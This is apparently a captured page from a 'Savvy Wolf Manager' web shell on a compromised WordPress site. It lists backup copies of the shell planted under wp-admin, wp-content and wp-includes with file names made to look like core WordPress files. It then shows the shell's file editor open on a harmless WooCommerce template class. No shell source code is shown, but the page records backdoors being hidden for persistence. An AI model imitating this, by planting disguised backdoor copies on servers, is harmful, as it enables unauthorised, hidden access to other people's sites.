Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: AbstractTemplate.php
<?php namespace Automattic\WooCommerce\Blocks\Templates; /** * AbstractTemplate class. * * Shared logic for templates. * * @internal */ abstract class AbstractTemplate { /** * The slug of the template. * * @var string */ const SLUG = ''; /** * Initialization method. */ abstract public function init(); /** * Should return the title of the template. * * @return string */ abstract public function get_template_title(); /** * Should return the description of the template. * * @return string */ abstract public function get_template_description(); }